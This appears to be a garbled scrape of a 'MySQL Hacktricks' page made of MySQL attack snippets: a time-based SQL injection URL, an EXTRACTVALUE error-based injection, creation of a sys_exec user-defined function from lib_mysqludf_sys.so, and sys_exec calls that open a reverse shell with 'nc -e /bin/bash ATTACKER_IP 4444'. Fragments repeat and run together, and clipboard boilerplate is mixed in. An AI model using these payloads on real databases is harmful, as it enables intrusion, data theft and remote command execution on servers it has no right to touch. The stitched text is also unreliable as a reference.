Verified: Mysql Hacktricks
Backup & snapshot leakage
CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so'; Use code with caution. Copied to clipboard mysql hacktricks verified
http://example.com/vulnerable-page?id=1 AND SLEEP(5) -- - Backup & snapshot leakage CREATE FUNCTION sys_exec RETURNS
SELECT 1 AND EXTRACTVALUE(1, CONCAT(0x7e, database(), 0x7e)); SELECT sys_exec('nc -e /bin/bash ATTACKER_IP 4444')
SELECT sys_eval('id'); SELECT sys_exec('nc -e /bin/bash ATTACKER_IP 4444');
If you have MySQL command line client access:
This effectively turns the database into a remote shell, bypassing file system restrictions that block webshell writing.